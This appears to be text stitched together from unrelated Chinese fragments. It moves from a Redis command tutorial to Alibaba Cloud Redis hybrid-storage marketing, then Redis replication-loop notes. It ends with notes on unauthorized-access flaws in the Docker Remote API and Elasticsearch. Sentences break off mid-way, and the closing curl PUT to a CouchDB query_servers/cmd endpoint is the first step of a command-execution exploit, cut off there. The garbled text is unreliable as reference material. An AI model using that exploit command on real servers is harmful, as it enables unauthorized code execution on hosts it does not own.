在上述准备⼯作圆满完成之后， 我们就可以开始学习 Redis 命令的基本知识了。 1.5 执⾏命令 Redis 服务器通过接收客户端发送的命令请求来执⾏指定的命令， 并在命令执⾏完毕之后通过响应将命令的执⾏ 结果返回给客户端， ⾄于结果的内容则被称为命令回复。 图 1-2 命令请求与响应 Redis 为每种数据结构和功能特性都提供了⼀簇相应的命令， 学习如何使⽤这些命令是学习 Redis 的重中之重。 幸运的是， 因为每个字符串都是由⼀系列连续的字节组成的， 所以字符串中的每个字节实际上都拥有与之相对应的索引。 Redis 为字符串键提供了⼀系列索引操作命令， 这些命令允许⽤户通过正数索引或者负数索引， 对字符串值的某 个字节或者某个部分进⾏处理， 其中： 字符串值的正数索引以 0 为开始， 从字符串的开头向结尾不断递增； 字符串值的负数索引以 -1 为开始， 从字符串的结尾向开头不断递减。 图 2-5 就展示了值为 "hello world" 图 2-10 展示了 description 键的值是如何随着 APPEND 命令的执⾏⽽变化的。 图 2-10 description 键的值随着 APPEND 命令的执⾏⽽变化 2.15.1 处理不存在的键 如果⽤户给定的键并不存在， 那么 APPEND 命令会先将键的值初始化为空字符串 "" ， 然后再执⾏追加操作， 最 终效果跟使⽤ SET 命令为键设置值的情况类似： redis> GET

e被保存在内存中，保证绝大部分访问请求的最高性能 。不常访问的Value（冷数据）则会被存储到磁盘上，以达到内存利用最高性价比。 架构 兼容性 100%兼容Redis协议和特性，用户无需做任何改动。 冷热数据分离 Redis混合存储型实例中，所有的Key和经常访问的Value被保存在内存中，保证绝大部分访问请求的 最高性能。不常访问的Value 率、Value大小这三个维度综 合考虑挑选出一些数据，通过后台线程将之存储到磁盘上。 当用户访问数据时，如果该数据对应的 Value在磁盘上，后台线程会从磁盘中交换数据到内存中。在此过程中，其它请求不受影响。 存储引擎 Redis混合存储型实例底层存储采用阿里自研下一代高性能全用户态存储引擎Alibaba FusionEngine： Alibaba Fusion 完全兼容Redis协议，用户无需修改任何代码。 大容量 突破内存容量限制，单实例最高可支持TB级别的数据容量。 高性能 Redis混合存储型实例的绝大部分热点请求直接从内存获取，其性能与高性能内存型实例完 全一致。 基于其冷热数据分离的特性，部分非热点数据（Value)被保存在磁盘。基于阿里云自研的用 户态存储软件栈以及充分发挥最新硬件的性能，访问（非热点数据）磁盘数据时，性能可达

Redis: A 和 B • A 收到客户端的请求: set k v • A 将请求通知到 B • B 收到请求后, 再次通知 A 解决方案: 标记客户端类型 双向回环 client Set k v set k v set k v set k v 复制回环 发生在多个点的互相同步过程 中 与双向回环的不同点在于 如果标记了客户端来源, 则无 法处理 A -> B -> C -> A 的问题

Remote API 是一个取代远程命令行界面（rcli）的REST API。存在问题的版本分别为 1.3 和 1.6因为权限控制等问题导致可以通过 docker client 或者 http 直接请求就可以访问这个 API，通过 这个接口，我们可以新建 container，删除已有 container，甚至是获取宿主机的 shell。 漏洞利用 环境介绍 环境搭建 vncviewer h的所有权限。可以对数据进行任意操作。业务系统将面临敏感数据泄 露、数据丢失、数据遭到破坏甚至遭到攻击者的勒索。 Elasticsearch服务普遍存在一个未授权访问的问题，攻击者通常可以请求一个开放9200或9300的 服务器进行恶意攻击。 #依次执行如下命令 curl -X PUT 'http://192.168.18.129:5984/_config/query_servers/cmd'